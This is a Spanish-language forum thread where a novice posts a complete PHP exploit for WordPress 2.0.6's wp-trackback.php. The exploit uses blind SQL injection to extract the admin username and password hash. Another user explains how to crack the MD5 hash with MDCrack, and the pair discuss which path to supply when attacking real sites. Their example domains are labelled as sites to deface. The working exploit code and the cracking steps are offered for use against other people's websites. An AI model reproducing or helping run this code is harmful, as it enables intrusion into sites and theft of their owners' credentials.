Exploit Zend_Hash_Del_Key_Or_Index en Php Duda!!

[maxmacell]

Una preguntita Compilando un Exploit en Php!!!

luego de compilado al ejecutarlo me pide el WordPress de la web a la que se lo estoy lanzando'''
he leido sobre esto en wiki mas o menos creo enterder que es?

es un sistema para la creacion de blogs o algo asi? entonces en esa parte que se pone???
tendre que poner la ruta de la pagina donde este el blog o algo asi segun entiendo leyendo el exploit?? pero es que si el exploit no me pide el WordPress ni me entero de que existe jajajajaja 
esto me va a conectar a este WordPress? esto es asi como My SQL??   

Perdon por la ignorancia o por no leer o buscar mas pero ya sabes como somos los novatos que se nos ataska el cerebro jejejej

saludos!!!

PD: este es el encabezado del Exploit

Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_ Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globa ls=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site:
Para ver este enlace Registrate o Inicia Sesion

PD:

Zend = Send "Enviar"

Hash = ya lo sabemos

Del = "Delete" Borrar

sera esto a lo que se refiere el Exploit que puedo recibir la clave borrar la clave o el indice??

A qui el Exploit completo

<?php
print_r('
---------------------------------------------------------------------------
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_ Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globa ls=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site:
Para ver este enlace Registrate o Inicia Sesion
---------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to wordpress
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)
Example:
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
---------------------------------------------------------------------------
');
    die;
}
error_reportin g(0);
ini_set("max_execution_ time",0);
ini_set("default_socket _timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="wp_";

for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
  $prefix=str_replace("-t","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

echo "\npwd hash   -> ";
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        if (in_array($i,$chars))
        {
        $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
        }
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

echo "admin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
          $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

function is_hash($hash)
{
 if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
  echo "exploit succeeded...";
}
else {
  echo "exploit failed...";
  }

?>

# milw0rm.com [2007-01-10]

[GeRaNgEl_88]

Este exploit es para sacar el hash md5 de un users de wordpress 2.0.6 y no para hacer una injection sql

Que es Hash Md5¿?

Una de las formas mas modernas de encriptación es utilizando el algoritmo MD5, este toma una mensaje y devuelve un hash de 128-bits (32 caracteres).

Es decir, es un algoritmo que toma una serie de caracteres (por ejemplo una contraseña, contraseña) y aplica una serie de transformacion es sobre esta para producir una cadena de 32 caracteres y que es función del mensaje de entrada.

Se almacenaría el hash resultante en lugar de la contraseña en si, de forma que si un atacante consigue hacerse con el no le sirva da nada, y a la hora de autentificar se generaría el hash de lo que ha introducido el usuario y se compararía con el hash de la contraseña. También cabe decir que casi nunca una mima palabra forma el mismo algoritmo, así que es completamente ilegible para cualquier persona.

Por esta forma tans segura de trabajar es que es usado en la mayoría de sistemas Linux, sitios webs y programas en general.

Pero digamos que tu después de un largo tiempo de tratar infructuosamen te logras hacerte con el pass de alguna cuenta que te interesa y de pronto te hallas ante la sorpresa que la contraseña añorada esta encriptada en MD5, como ya he dicho, es completamente ilógico tratar de usar este hash así de plano, pero como alguien dijo "quien dijo que todo esta perdido" nunca uno se debe rendir.

Hay en internet una infinidad de programas que tratan de leer el algoritmo de un hash MD5 y desencriptarlo, pero solo uno me ha dado buenos resultados, se llama MDCrack y lo puedes descargar de este mismo site haciendo clic AQUI.

Una vez descargado es recomendable descomprimirlo en C:\ (así te evitaras mucho problemas), estando allí abres tu MS-DOS ( Inicio/ejecutar y escribes cmd).

Cuando tienes todo listo y creyendo que en verdad lo descomprimiste en C:\ escribes mdcrack.exe y te va a dar unos cuantos comandos de ayuda pero lo que en verdad necesitas escribir es esto :

C:\>mdcrack.exe -M MD5 d01114deff7688 1ad7397622d93a 5cb7

El resultado sera algo asi :



Ahí comenzara el proceso de desencriptación de el dato entrado, tu máquina se pondrá media lenta mientras corra el proceso, así que te aconsejo uses el método antes de irte a dormir y lo dejes trabajando solo, cuando regreses al otro día tendrás un lindo regalo esperando.

[maxmacell]

muchisimas gracias  GeRaNgEl_88 por t pronta respuesta!!!

lo de hash Md5 ya sabia alguito pero con esta tremenda explicacion con la que te luciste aqui no creo que me queden dudas con respecto a esto??

pero me quedo la duda sobre el wordpress??

que deberia poner en esa parte en el exploit?

O mejor como se usa worddpress asi entendiendo su funcionamiento podria entender mejor por que y que me pide el exploit!!! y una vez obtenido el Hash en Md5 y crakeado pues hacer la entrada correspondient e?

PD: el exploit no es para hacer SQL inyection pero el optiene este hash pormedio de este metodo verdad?

en el exploit hay que especificar wordpress y un puerto?

C:\>Exploit.exe  host path Options

Host = el sitio a atakar

Path = path para wordpress

Option = opciones de puerto para conexion y para especificar una tabla de wordpress (CREO)!!!!!


Ahora el probelma es Que pongo en path? o si me dicen alguna pista para saber cual seria esa ruta!! se que debe ser facil pero estoy TAPAO jejejejejejeje je!!

saludos!! y GRACIAS   GeRaNgEl_88  te la comiste con esa explicacion

[GeRaNgEl_88]

Si tienes una pagina que es:
Para ver este enlace Registrate o Inicia Sesion

www.lapaginaad efacear.net

/loquesea
/loquesea => es el path
Entiendes¿? osea el Path es como un camino en el URL

Espero que te sirva....

[maxmacell]

Si tienes una pagina que es:
Para ver este enlace Registrate o Inicia Sesion

www.lapaginaad efacear.net

/loquesea
/loquesea => es el path
Entiendes¿? osea el Path es como un camino en el URL

Espero que te sirva....

Primero que todo disculpas por el tiempo sin conectarme es que el trabajo no me dejaba libre casi nada de tiempo!!!!!

Hola GeRaNgel son muy exactas tus explicaciones!! te felicito y gracias por dedicar un poco de tu tiempo!!!

Ahora el detalle es que no reconozco un path de wordpress ni que me estrelle con el jajajajajaja!!!

por ejemplo en esta web
Para ver este enlace Registrate o Inicia Sesion

www.lotienesto do.com

mirala cual seria el path de el wordpress??

y si puedes me enseñas a reconocerlo por que la verdad que no doy???

jejeje saludos amigo y gracias por tu tiempo!!! y elñ de todos aquellos que ponen su granito de arena en ayudar a incrementar nustro conociminto!!!